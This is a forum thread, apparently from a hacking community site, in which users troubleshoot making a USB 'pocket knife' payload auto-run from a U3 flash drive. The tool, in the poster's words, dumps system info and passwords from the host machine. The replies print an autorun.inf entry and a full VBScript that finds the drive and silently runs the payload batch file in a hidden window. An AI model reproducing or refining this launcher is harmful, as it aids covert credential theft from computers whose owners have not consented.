Jump to content

U3 Autorun doesn't work

Blue Dragon

Recommended Posts

Hey guys,

I just bought a 16GB Sandisk cruzer 16GB usb flash drive with U3 technology. I downloaded the Leapos Payload v0880 (latest) and the Universal Customizer from Hak5. I then copied the ISO from the U3-Directory of the Leapos-Release to the BIN directory of Universal Customizer and ran the exe. There were no errors and flashing the U3-Partition seemed to go fine.

I then copied the files from the "Flash Partition"-Folder to my flash partition on the cruzer. After that I ran Menu.bat and configured the settings for which modules to run ect.

All that seemed to work just fine but I can't get the thing to do autorun. I used to have the Leapos on my old flash drive without the U3 and it worked, but with the U3, nothing happens when I plug it into my computer. Also running it manually but starting the Menu.bat and selecting option "2. Run USB Pocket Knife" gives me an error from Windows Script Host:

Script: h:\SYSTEM\GO.VBS

Line: 16

Error: Can't find the file

Code: 80070002

The VBS-Script is definitely in h:\SYSTEM\GO.VBS (the U3-Partition) and line 16 in that scipt calls Start.Bat also in h:\SYSTEM\START.BAT

If objFSO.FileExists(objDrive.DriveLetter & ":\SYSTEM\Start.bat") Then
        objShell.Run ".\System\Start.bat " & strPath , 0, False
    End If

I noticed that in the VBS-Script it says ".\System\Start.bat" whereas windows explorer shows "\SYSTEM\START.BAT" in capital letters. May the problem already lay here?

Also the AUTORUN.INF is written in upper case whereas it was Autorun.inf on my previous non-U3-flashdrive.

Running START.BAT manually kind of works. There're still some issues with file paths but this may be due to me using the german version of windows with Firefox and other programs only as Portable Apps so there's no data in C:\Programm Files\*whatever app* Other than that it dumps all the system info/passwords ect just fine.

I checked in the registry under HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Cdrom. Autorun is set to 1 there.

Also HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutorun is set to 0x91 which is the default setting.

(http://support.microsoft.com/kb/967715/ + http://communities.sandisk.com/sandisk/boa...essage.id=4070)

So Autorun itself should work and does on other CD/flash drives. Usually you can just right click the device in Explorer and select Autorun but this Option is also not there with my U3 drive.

So, can anyone point me in the right direction as to why Autorun doesn't work with my U3 Sandisk cruzer? A little help would be much appreciated! ;)


So, I've managed to get the VBS-script to run by changing line 16 to

objShell.Run "Start.bat" , 0, False

However, autorun still doesn't work. I have a U3 parition with Autorun.inf on the root folder of it

shellexecute=wscript SYSTEM\go.vbs

Also, when I right click on the U3 drive, there's no option in the menu to start Autorun as there is with normal CDs and my old flash drive that has the Autorun.inf in its root.

Does anybody know how to enable autorun on the U3 partition? I runs perfectly when being started manually with the VBS.

Link to comment
Share on other sites

  • 1 month later...

i did a lil bit of searching around for this but its in the forums here....

For AUTORUN.INF (props to vanguard):

open=wscript SYSTEM\go.vbs




For GO.VBS (props to SWFu):

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("Wscript.Shell")
Set colDrives = objFSO.Drives
Set objEnv = objShell.Environment("PROCESS")

objEnv("Year") = Year(now())
objEnv("Month") = Right("0" & Month(now()), 2)
objEnv("Day") = Right("0" & Day(now()), 2)
objEnv("Hour") = Right("0" & Hour(now()), 2)
objEnv("Minute") = Right("0" & Minute(now()), 2)
objEnv("Second") = Right("0" & Second(now()), 2)

For Each objDrive in colDrives

strPath = objDrive.Driveletter & ":"

If objDrive.DriveType = 4 Then
If objFSO.FileExists(objDrive.DriveLetter & ":\SYSTEM\Start.bat") Then
objShell.Run objDrive.DriveLetter & ":\SYSTEM\Start.bat " & strPath , 0, False
Exit For
End If
End If

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...